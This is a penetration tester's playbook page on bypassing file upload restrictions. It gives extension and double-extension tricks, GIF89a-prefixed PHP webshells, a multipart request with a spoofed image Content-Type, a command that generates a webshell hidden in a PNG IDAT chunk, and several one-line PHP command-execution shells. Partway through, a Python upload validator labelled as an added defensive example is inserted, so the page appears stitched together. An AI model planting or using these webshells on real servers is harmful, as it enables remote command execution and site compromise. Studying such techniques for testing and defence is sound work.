Jackmeister's Playbook
File Upload Tricks

When uploading files, check for validation on:

  1. File extension

    • Which server-side extensions are allowed?

    php
    phtml
    php4
    • Stacking / double extension

    .php.png
    .%20.php

Using a GIF header (shell.php):

GIF89a;
<?php
system($_GET['cmd']);
?>

Advanced GIF (multipart upload with an image Content-Type):

Content-Disposition: form-data; name="upload"; filename="web.php"
Content-Type: image/png

GIF89a;
<?php
system($_GET['cmd']);
?>

  2. Content-Type header

  • Can a server-side extension such as .php get past the upload restriction?

  • If yes, change the Content-Type header to an image type (e.g. image/png) and the file will still run as PHP.

  • Does the server validate the Content-Type header, e.g. by disallowing application/json?

  3. Magic bytes (file hex value)

  • Does the server check the file signature?

  • If not, the file signature can be changed with hexedit.
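As an added defensive example (not code from the playbook), a Python upload validator that applies the three checks above: an extension allowlist, agreement between extension and declared Content-Type, and a magic-bytes check, plus a scan for PHP tags so the double-extension, %20 and GIF89a tricks listed here are all rejected. The ALLOWED table and validate_upload() are assumptions for illustration.

```python
"""Upload validator (added example, not from the playbook)."""
import re
from urllib.parse import unquote

# Allowlist (assumption): the final extension must be listed here, and the
# declared Content-Type and the file's magic bytes must agree with it.
ALLOWED = {
    "png": ("image/png", b"\x89PNG\r\n\x1a\n"),
    "jpg": ("image/jpeg", b"\xff\xd8\xff"),
    "jpeg": ("image/jpeg", b"\xff\xd8\xff"),
    "gif": ("image/gif", b"GIF8"),
}
# Executable extension anywhere in the name catches stacking (.php.png).
DANGEROUS = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.IGNORECASE)
# PHP open tags in the body; a GIF89a prefix followed by <?php still runs.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def validate_upload(filename: str, content_type: str, data: bytes) -> str:
    """Return 'ok' or a 'rejected: ...' string explaining the refusal."""
    # Decode %20 etc. so '.%20.php' is inspected as '. .php'.
    name = unquote(filename).strip()
    if DANGEROUS.search(name):
        return "rejected: executable extension in filename"
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext not in ALLOWED:
        return f"rejected: extension '{ext}' not allowed"
    expected_type, magic = ALLOWED[ext]
    # Compare only the media type; ignore parameters such as charset.
    if content_type.split(";")[0].strip().lower() != expected_type:
        return "rejected: Content-Type does not match extension"
    if not data.startswith(magic):
        return "rejected: magic bytes do not match extension"
    # Raw-byte scan: may false-positive on binary data, which is acceptable
    # for a reject-by-default upload path.
    if PHP_TAG.search(data):
        return "rejected: PHP tag embedded in image data"
    return "ok"
```

The raw-byte scan does not cover payloads that only appear after the image is decoded or re-encoded, so storing uploads outside the web root under a server-generated name, with no executable extension, remains the primary control.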

PHP Function Exploit

imagecopyresampled() / imagecreatefromstring(): the server decodes and re-encodes the uploaded image, so a payload placed in the header or metadata does not survive.

Solution: hide the webshell in the IDAT chunk of a PNG.

https://github.com/huntergregal/PNG-IDAT-Payload-Generator/tree/master
python3 generate.py -m php -o webshell.png

Rename to webshell.png.php

Shell exec

PHP functions that execute commands: shell_exec(), exec(), system()

Examples

<?php echo shell_exec($_GET['command']); ?>
<?php echo exec($_GET['command']); ?>
<?php echo system($_GET['command']); ?>
<?php echo exec($_GET['e'].' 2>&1'); ?>
<?php system($_GET['e'].' 2>&1'); ?>
<?php echo shell_exec($_GET['e'].' 2>&1'); ?>

Content-Types of Common Files

Pictures:

image/png
image/jpeg
image/gif

JSON:

application/json

PHP:

application/x-php
application/x-www-form-urlencoded
multipart/form-data
application/octet-stream

TXT:

text/plain

XML:

application/xml
text/xml

HTML:

text/html

JAVASCRIPT:

text/javascript
application/javascript

PDF:

application/pdf

AUDIO:

audio/mpeg
audio/wav

VIDEO:

video/mp4
video/quicktime
Last updated 1 year ago